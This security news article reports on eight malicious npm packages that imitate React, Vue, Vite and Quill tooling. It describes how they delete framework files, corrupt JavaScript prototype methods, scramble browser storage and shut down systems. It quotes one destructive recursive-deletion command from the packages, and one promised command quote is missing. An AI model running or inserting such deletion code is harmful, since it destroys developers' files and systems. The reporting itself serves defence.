Ddos 
In a disturbing development for the JavaScript community, Socket’s Threat Research Team has uncovered a stealthy and destructive supply chain attack campaign in the npm ecosystem. Malicious packages masquerading as legitimate tools have been actively targeting widely used frameworks such as React, Vue.js, Vite, and the Quill Editor, embedding code designed to corrupt data, destroy files, and even shut down systems.
“These malicious packages have remained undetected in the npm ecosystem for over more than two years, accumulating over 6,200 downloads,” Socket researchers report.
The threat actor, operating under the npm alias xuxingfeng and using the email address 1634389031@qq[.]com, published eight destructive packages while simultaneously maintaining a portfolio of legitimate ones. This blend of good and bad packages creates a deceptive trust profile — a classic case of dual-use publishing.
“This mixed publishing approach helps mask malicious intent by establishing credibility and trust within the ecosystem.”
The malicious packages use typosquatting and name mimicry to lure developers. Examples include:
- vite-plugin-react-extend (vs. @vitejs/plugin-react)
- vite-plugin-vue-extend (vs. @vitejs/plugin-vue)
- vite-plugin-bomb (vs. vite-plugin-html)
- quill-image-downloader (similar to legitimate Quill plugins)
By adopting these misleading names, the attacker successfully inserted malware into critical development pipelines.
These packages delete core files from popular JavaScript frameworks. For instance, vite-plugin-bomb and vite-plugin-react-extend launch recursive deletion attacks against React, Vite, and Vue.js.
“process.execSync(rimraf ${node_modules}vue\\dist);” — destructive code embedded in the plugin.
The vite-plugin-vue-extend module even deploys a seven-stage attack, systematically targeting 19 essential libraries in the Vue ecosystem over a six-week timeline using randomized intervals.
The js-hood package subtly corrupts JavaScript’s core functionality. It overrides critical methods like Array.prototype.filter, String.prototype.split, and more, replacing expected results with random characters.
“This package is particularly dangerous because it directly attacks core JavaScript prototype methods… ensuring corrupted and unpredictable outputs.”
quill-image-downloader executes a three-phase attack targeting localStorage, sessionStorage, and cookies, scrambling stored data used for user sessions, authentication, and UI state.
“Unlike other packages that cause immediate, obvious damage… this attack corrupts client-side data in a way that causes persistent, hard-to-diagnose application failures.”
The js-bomb and vue-plugin-bomb packages forcibly shut down systems and delete framework files using scheduled multi-phase payloads. One of the embedded commands reads:
These payloads run in rapid intervals, often every second, leaving administrators with mere seconds to react before system shutdowns and data destruction occur.
The attackers took care to ensure cross-platform compatibility, dynamic path resolution, error handling, and scheduled activation to avoid detection and delay analysis. Several packages included minified code and error-suppressing try/catch blocks, adding to their stealth.
“Once activated, the attacks execute at intervals ranging from aggressive 1-second loops to randomized 5-10 minute windows.”
As of this writing, the malicious packages are still live on the npm registry. Socket has petitioned for their removal but warns that installations may still exist in local or production environments.
Related Posts:
- Nuxt Users Beware: CVE-2025-27415 Opens the Door to Cache Poisoning Attacks
- Millions at Risk: PoC Exploit Releases for Vite Arbitrary File Read Flaw (CVE-2025-30208)
- Vitest Vulnerability Exposes Developers to Remote Code Execution – CVE-2025-24964 (CVSS 9.7)
- Zero-Day Attack Alert: Corrupted Files Weaponized in New Attacks
Donate